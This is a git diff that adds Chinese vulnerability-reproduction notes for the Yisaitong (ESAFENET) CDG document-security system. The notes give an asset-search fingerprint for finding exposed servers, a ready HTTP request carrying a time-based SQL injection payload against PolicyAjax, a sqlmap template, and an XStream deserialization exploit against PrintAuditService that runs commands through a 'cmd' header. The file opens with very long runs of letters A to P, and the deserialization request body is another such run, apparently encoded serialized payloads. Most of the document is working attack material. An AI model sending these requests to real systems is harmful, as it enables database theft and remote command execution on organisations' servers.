HNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706614725312-fce23f6b-55c1-4c1d-88b6-57f8f2eba2c8.png](./img/mNluLungjp6mX99D/1706614725312-fce23f6b-55c1-4c1d-88b6-57f8f2eba2c8-305380.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wz2tmtu1guybh6uz>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..e0ed595
--- /dev/null
+++ b/亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞.md
@@ -0,0 +1,61 @@
+# 亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/f3AbW-RS96XvK7XY/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-693103.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/dojojs/../PolicyAjax HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Length: 64
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: no-cache
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Pragma: no-cache
+Upgrade-Insecure-Requests: 1
+
+command=selectOption&id=1';WAITFOR DELAY '0:0:5'--&type=JMCL
+```
+
+![1706531531789-5d3e4e10-b8a8-43a3-bca6-fffb757ac467.png](./img/f3AbW-RS96XvK7XY/1706531531789-5d3e4e10-b8a8-43a3-bca6-fffb757ac467-654309.png)
+
+sqlmap
+
+```plain
+POST /CDGServer3/dojojs/../PolicyAjax HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Length: 64
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: no-cache
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Pragma: no-cache
+Upgrade-Insecure-Requests: 1
+
+command=selectOption&id=1&type=JMCL
+```
+
+![1706531565480-674887a2-8ef1-4fc3-ad2c-5ed7a84ec96c.png](./img/f3AbW-RS96XvK7XY/1706531565480-674887a2-8ef1-4fc3-ad2c-5ed7a84ec96c-451959.png)
+
+[亿赛通电子文档安全管理系统-policyajax-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621695239-0f1784ad-ca08-49f2-8175-88860849d9db.yaml)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gh6izxum78ql1255>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统PrintAuditService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统PrintAuditService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..130008c
--- /dev/null
+++ b/亿赛通电子文档安全管理系统PrintAuditService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统PrintAuditService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统PrintAuditService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/XmvjKIvAHgRrl84Y/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-102111.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/PrintAuditService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKL